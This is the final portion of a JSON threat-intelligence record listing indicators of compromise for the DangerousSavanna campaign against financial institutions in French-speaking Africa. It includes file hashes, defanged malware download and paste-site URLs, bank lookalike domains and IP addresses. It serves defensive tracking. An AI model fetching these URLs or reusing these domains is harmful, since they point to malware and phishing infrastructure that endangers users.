\r\nc4ee082a4ce704dcb3145e2cfd47ef6f\r\nc7beb386813580a4c4812de3ee1aa429\r\nc8ed3353ae9c8b84ea7a9e81d2828193\r\nc9c001c45b2eecaee9704fb21e731ac7\r\nca09b19b6975e090fb4eda6ced1847b1\r\ncced9e8b1a99b9000f4b958f13b164a5\r\nd32e387d60a18fd90c4854f167b4df4b\r\nd43e6ae895039108cf68a36140190b0f\r\ndaa6ce148e2b8e5fd694183338db6ec9\r\ne166ee1de912bf17453d2da1dc06fc6d\r\ne2c3a6bcb015e2e5137d4a46881d38b6\r\nf0960552876da5ef74b8ece55116929e\r\nf2afcfd2ecfb3ea3261855ce1a4747b7\r\nf4a8605fa09e447108eb714eccad57d0\r\nfae63014d33efe844a25f2606de900b6\r\niplogger[.]org/2zaEa6\r\nbit[.]ly/PDF_MicrosoftOnline\r\ncdn.filesend[.]jp/private/hTsvHkbWaUSEZ7ilocBGMTgumxqFmSrVgF-9Ht5LL6YCf4A7Eu28rIxdbo-ND_F9/Chimers.gif\r\n4sync[.]com/web/directDownload/QHZsERS6/rHb0lMWD.f2e6a9154ab6cd29b337d6b555367580\r\n4sync[.]com/web/directDownload/rE33SDmE/iNX​XJkWJ.4bf28df12d9e7d99bc902edb6d23c6e2\r\nraw.githubusercontent[.]com/R3mEm/vox/main/vox.ps1\r\npaste.c-net[.]org/CookiesEstrogen\r\npaste.c-net[.]org/ExportDeposit\r\npaste.c-net[.]org/OrientalAntonio\r\npaste.c-net[.]org/ShaveDavie\r\npaste.c-net[.]org/SidingFatigue\r\npaste.c-net[.]org/HearingsGuided\r\npaste.c-net[.]org/SelvesGangster\r\npaste.c-net[.]org/StaceConcerns\r\npaste.c-net[.]org/BogeyUglier\r\npaste.c-net[.]org/MuggingFunny\r\npaste.c-net[.]org/NelsonTasteful\r\npaste.c-net[.]org/ShaveDie\r\npaste.c-net[.]org/GiovanniKismet\r\npaste.c-net[.]org/TreatsGlamour\r\npaste.c-net[.]org/NeedlessHorton\r\npaste.c-net[.]org/KillingsSucked\r\npaste.c-net[.]org/PuckerStake\r\npaste.c-net[.]org/AliacesLorean\r\npaste.c-net[.]org/HazelMagnets\r\npaste.c-net[.]org/AliasesKorean\r\npaste.inexa-group[.]com\r\npress.giize[.]com\r\ntf-bank[.]com\r\naeternam[.]me\r\nnedbank.za[.]com\r\nnedbankplc.4nmn[.]com\r\nsecure.graviom[.]fr\r\ni-development[.]one\r\n15.236.51[.]204\r\n3.8.126[.]182\r\n35.181.50[.]113\r\n13.37.250[.]144\r\n13.38.90[.]3\r\n137.116.142[.]70\r\n170.130.172[.]46\r\n192.18.141[.]199\r\n20.70.163[.]11\r\n192.9.244[.]42\r\n20.194.195[.]96\r\nSource: https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/"
	],
	"report_names": [
		"dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa"
	],
	"threat_actors": [
		{
			"id": "286172a2-6946-475d-a5a2-3cf985155a06",
			"created_at": "2023-01-06T13:46:39.460654Z",
			"updated_at": "2026-04-18T02:00:03.631394Z",
			"deleted_at": null,
			"main_name": "DangerousSavanna",
			"aliases": [],
			"source_name": "MISPGALAXY:DangerousSavanna",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1776306118,
	"ts_updated_at": 1776478857,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5f969656b2cf534dc73f76d861e789b18efead0e.pdf",
		"text": "https://archive.orkl.eu/5f969656b2cf534dc73f76d861e789b18efead0e.txt",
		"img": "https://archive.orkl.eu/5f969656b2cf534dc73f76d861e789b18efead0e.jpg"
	}
}